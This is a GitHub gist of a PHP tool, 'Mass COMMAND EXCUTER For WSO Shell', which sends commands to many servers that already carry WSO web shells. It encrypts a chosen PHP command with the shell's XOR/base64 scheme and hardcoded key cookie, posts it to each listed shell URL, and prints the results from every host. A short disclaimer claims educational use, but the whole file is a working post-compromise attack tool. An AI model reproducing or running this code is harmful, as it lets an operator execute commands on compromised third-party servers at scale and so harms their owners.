Skip to content

Instantly share code, notes, and snippets.

@DamaneDz DamaneDz/wso_cmd.php
Last active Jul 3, 2019

Embed
What would you like to do?
<?php
/*
Mass COMMAND EXCUTER For WSO Shell 4.*.*
Modified and Made on 26/06/2019 By DamaneDz
This Script used for authorized testing and/or educational purposes only.
Run it on your own localhost or your server.
I take no responsibility for the abuse of the script.
Notes:
* DON't CHANGE THE USER AGENT VALUE.
* DON'T CHANGE THIS VALUE: 130a06df177c97a2e2b12b5a17719ce1.
*/
// This function was written line by line !
function encrypt_x($str,$pwd){
$pwd=base64_encode($pwd);
$str=base64_encode($str);
$enc_chr="";
$enc_str="";
$i=0;
while($i<strlen($str)){
for($j=0;$j<strlen($pwd);$j++){
$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));
$enc_str.=$enc_chr;
$i++;
if($i>=strlen($str))break;
}
}
return base64_encode($enc_str);
}
// This function has no role in this script !
function decrypt($str,$pwd){
$pwd=base64_encode($pwd);
$str=base64_decode($str);
$enc_chr="";
$enc_str="";
$i=0;
while($i<strlen($str)){
for($j=0;$j<strlen($pwd);$j++){
$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));
$enc_str.=$enc_chr;
$i++;
if($i>=strlen($str))break;
}
}
return base64_decode($enc_str);
}
function curl($url,$eval){
$host=parse_url($url);
$md5host=md5($host['host']);
$p1_encrypted= encrypt_x($eval,"130a06df177c97a2e2b12b5a17719ce1");
$paramsPost = array("a"=>"GBMlAA==","p1"=>"{$p1_encrypted}","charset"=>"UTF-8","p2"=>"","c"=>"AWcfAzoXeQ8=","p3"=>"","ajax"=>"true",);
$ch=curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0");
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIE, "{$md5host}key=130a06df177c97a2e2b12b5a17719ce1");
curl_setopt($ch, CURLOPT_POSTFIELDS, $paramsPost);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$f = curl_exec($ch);
preg_match("#innerHTML='(.*?)';#i",$f,$x);
return array($host['host'], $x[1]);
curl_close($ch);
}
print '<center><form method="POST">
<p><span style="font-size: 20pt"><font color="#c41013">WSO Shell</font> Command Excuter</span></p>
<p>Shells (<font color="#c41013">That you want to run command from it !</font>)<br><textarea rows="22" name="shells" cols="48">'.$shells.'</textarea></p>
<p><font color="#c41013">Command: </font><br><input type="text" value="system(\'id\');" name="cmd"></p>
<p><input type="submit" value="Excute" name="exec"></p>
</form></center>';
if(isset($_POST["exec"])){
foreach(explode("\n",$_POST['shells']) as $shell){
$result = curl(trim($shell),trim($_POST['cmd']));
$result= str_replace(array('\n','\r'),array("<br>","") , $result);
if(!empty($result[0]) && !empty($result[1])){
print "THE HOST: ".$result[0]."<br>";
print "THE EXEC RESULT: ".$result[1]."<br>";
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.